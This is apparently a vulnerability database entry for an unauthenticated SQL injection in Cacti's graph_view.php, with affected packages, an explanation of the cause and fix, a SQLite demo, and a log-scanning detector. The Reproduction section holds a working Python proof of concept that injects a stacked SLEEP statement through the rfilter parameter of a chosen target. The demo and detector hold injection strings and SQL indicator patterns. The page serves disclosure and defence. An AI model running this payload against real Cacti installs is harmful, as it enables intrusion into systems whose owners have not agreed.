Unauthenticated SQL Injection in graph_view.php in Cacti
Description
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
13 entries.
- Cacti upstream (no CPE), listed twice: range < 1.2.25
- osv-coords, 11 package versions (each with no CPE; the ranges below are given in the same order as the page lists the package URLs):
  - pkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.4 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.5 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/opensuse/cacti&distro=openSUSE%20Tumbleweed range: < 1.2.25-2.1
  - pkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.4 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.5 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2012 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP4 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP5 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2012 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP4 range: < 1.2.25-bp155.2.3.1
  - pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP5 range: < 1.2.25-bp155.2.3.1
Patches
Vulnerability mechanics
Root cause
"The `grow_right_pane_tree` function in `graph_view.php` directly uses user-supplied input in a SQL query without proper sanitization."
Attack vector
The vulnerability exists in `graph_view.php` and is accessible via the `tree_content` action. Since guest users can access this page without authentication by default, an attacker can send a crafted `rfilter` parameter. This parameter is intended to be a regular expression but is improperly handled within the SQL query, allowing for SQL injection. The PoC demonstrates this by using a payload that includes a SQL `SLEEP` command, causing a noticeable delay in the response [ref_id=1].
Affected code
The vulnerability resides within the `grow_right_pane_tree` function, which is invoked from the `graph_view.php` file. Specifically, the `rfilter` parameter, after being validated by `html_validate_tree_vars` and `validate_is_regex`, is directly embedded within a SQL query using double quotes for the `RLIKE` clause in `lib/html_tree.php` [ref_id=1].
What the fix does
The advisory states that the issue is addressed in version 1.2.25 but does not include a patch diff, so the exact change is not shown here. The remediation for this bug class is to stop splicing `rfilter` into the SQL text: pass it as a bound parameter, or escape it for the SQL string literal, so that a quote character cannot terminate the `RLIKE "..."` literal and start a new statement. Note that `validate_is_regex` is not a defence on its own: a regular expression may legally contain `"` and `;`, which is exactly what the PoC payload relies on [ref_id=1].
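To make the affected-code and fix paragraphs concrete, the following is an added example written for this page; it is not Cacti code and not the 1.2.25 patch. It models the described bug class in Python with SQLite: the table `graph_titles`, the `validate_is_regex` stand-in, the single-quoted literal (SQLite reads double-quoted text as an identifier, whereas Cacti's MySQL query used double quotes) and the hostile pattern are all this example's own assumptions, and SQLite's `REGEXP` plays the role of MySQL's `RLIKE`.

```python
import re
import sqlite3

# Constructed sample titles standing in for graph names in a Cacti tree (not real data).
SAMPLE_TITLES = [("cpu usage",), ("traffic eth0",), ("disk io",)]


def validate_is_regex(pattern: str) -> bool:
    """Stand-in for Cacti's validate_is_regex(): true if the pattern compiles.

    This is the only check the page describes before rfilter reaches SQL, and it
    says nothing about quote characters, which are perfectly legal in a regex.
    """
    try:
        re.compile(pattern)
    except re.error:
        return False
    return True


def _connect() -> sqlite3.Connection:
    """In-memory table with a REGEXP function, playing the role of MySQL's RLIKE."""
    conn = sqlite3.connect(":memory:")
    # SQLite evaluates `value REGEXP pattern` as regexp(pattern, value).
    conn.create_function("REGEXP", 2, lambda pat, val: 1 if re.search(pat, val) else 0)
    conn.execute("CREATE TABLE graph_titles (title TEXT)")
    conn.executemany("INSERT INTO graph_titles VALUES (?)", SAMPLE_TITLES)
    return conn


def filter_vulnerable(rfilter: str) -> list[str]:
    """The bug class: a regex-validated value is spliced into the SQL string literal."""
    if not validate_is_regex(rfilter):
        return []
    conn = _connect()
    sql = f"SELECT title FROM graph_titles WHERE title REGEXP '{rfilter}' ORDER BY rowid"
    return [row[0] for row in conn.execute(sql)]


def filter_fixed(rfilter: str) -> list[str]:
    """The fix class: the value travels as a bound parameter, so it is only ever data."""
    if not validate_is_regex(rfilter):
        return []
    conn = _connect()
    sql = "SELECT title FROM graph_titles WHERE title REGEXP ? ORDER BY rowid"
    return [row[0] for row in conn.execute(sql, (rfilter,))]


if __name__ == "__main__":
    benign = "^cpu"
    # Hypothetical payload for this demo: it compiles as a regex yet ends the SQL literal.
    hostile = "x' OR '1'='1"
    print("regex check accepts payload:", validate_is_regex(hostile))
    print("vulnerable, benign :", filter_vulnerable(benign))
    print("vulnerable, hostile:", filter_vulnerable(hostile))
    print("fixed, hostile     :", filter_fixed(hostile))
```

Both functions behave identically for an honest pattern such as `^cpu`; the difference only appears when the value contains the literal's own delimiter, which the regex validator happily accepts. Stacked statements (as in the page's `SLEEP` payload) are refused by `sqlite3.execute`, so this demo uses an `OR` tautology to show the same boundary being crossed.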
Preconditions
- config: Guest user access must be enabled in the Cacti configuration.
- auth: None. The guest account reaches the vulnerable `graph_view.php` page without logging in.
Reproduction
```python
import argparse
import time
import urllib3

import requests

sleep_time = 10
# Breaks out of the double-quoted RLIKE literal, then stacks a SLEEP() statement.
payload = f"""OR ""="("")));SELECT SLEEP({sleep_time});-- -"""


def exploit():
    url = f"{target}/graph_view.php"
    # tree_content is reachable by the guest account when guest access is enabled.
    params = {
        "action": "tree_content",
        "node": "1-1-tree_anchor",
        "rfilter": payload,
    }
    print('[+] Sending payload...')
    print(f"[+] Payload: {payload}")
    started = time.perf_counter()
    session.get(url, params=params)
    elapsed = time.perf_counter() - started
    print(f"[+] Response after {elapsed:.1f}s (expect roughly {sleep_time}s if vulnerable)")


if __name__ == '__main__':
    urllib3.disable_warnings()
    parser = argparse.ArgumentParser(
        description="Cacti 1.2.24 - graph_view.php 'rfilter' SQL Injection (guest access)")
    parser.add_argument('-t', '--target', required=True,
                        help='Base URL of the Cacti install, e.g. http://host/cacti')
    args = parser.parse_args()
    target = args.target
    session = requests.Session()
    exploit()
```
[ref_id=1]
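For operators who want to confirm exposure in hindsight or watch for attempts while a patch is rolled out, here is an added example of detection logic; it is not part of the original page and not Cacti code. It scans Apache-style access log lines for `graph_view.php` `tree_content` requests whose decoded `rfilter` value carries SQL syntax rather than a graph-title regex. The log lines, addresses, user agents and the indicator list are constructed for this example; the second line holds the page's `SLEEP` payload in the URL-encoded form `requests` would send it in.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines for this example; no real server produced them.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2023:10:01:02 +0000] "GET /cacti/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%5Ecpu HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Sep/2023:10:01:09 +0000] "GET /cacti/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=OR+%22%22%3D%22%28%22%22%29%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
198.51.100.9 - - [10/Sep/2023:10:02:00 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Things a graph-title regex essentially never needs but a SQL payload almost always does.
INDICATORS = [
    ("quote", re.compile(r"""["']""")),
    ("statement_terminator", re.compile(r";")),
    ("sql_comment", re.compile(r"--\s|/\*")),
    ("time_based", re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\b", re.I)),
    ("select_union", re.compile(r"\b(?:select|union)\b", re.I)),
]


def score_rfilter(rfilter: str) -> list[str]:
    """Names of the indicators present in an already-decoded rfilter value."""
    return [name for name, rx in INDICATORS if rx.search(rfilter)]


def scan_access_log(text: str) -> list[dict]:
    """Return one alert per tree_content request whose rfilter looks like SQL."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("graph_view.php"):
            continue
        # parse_qs percent-decodes and turns '+' into spaces, as PHP does for $_GET.
        qs = parse_qs(parts.query, keep_blank_values=True)
        if qs.get("action", [""])[0] != "tree_content" or "rfilter" not in qs:
            continue
        rfilter = qs["rfilter"][0]
        hits = score_rfilter(rfilter)
        if hits:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                           "rfilter": rfilter, "indicators": hits})
    return alerts


if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']} rfilter={a['rfilter']!r} indicators={a['indicators']}")
```

The detector keys on the decoded value rather than the raw query string, so percent-encoding and `+` spacing do not hide the payload. A quote or semicolon alone is a weak signal; the combination with a time-based primitive and a comment sequence, as in the page's PoC, is what should page someone. Logs that truncate or omit the query string will not carry `rfilter` at all, in which case request-level capture (reverse proxy or WAF logs) is needed.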
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6 references.
1. github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg (mitre, x_refsource_CONFIRM)
2. lists.debian.org/debian-lts-announce/2024/03/msg00018.html (mitre)
3. lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/ (mitre)
4. lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/ (mitre)
5. lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/ (mitre)
6. www.debian.org/security/2023/dsa-5550 (mitre)
News mentions
No linked articles in our index yet.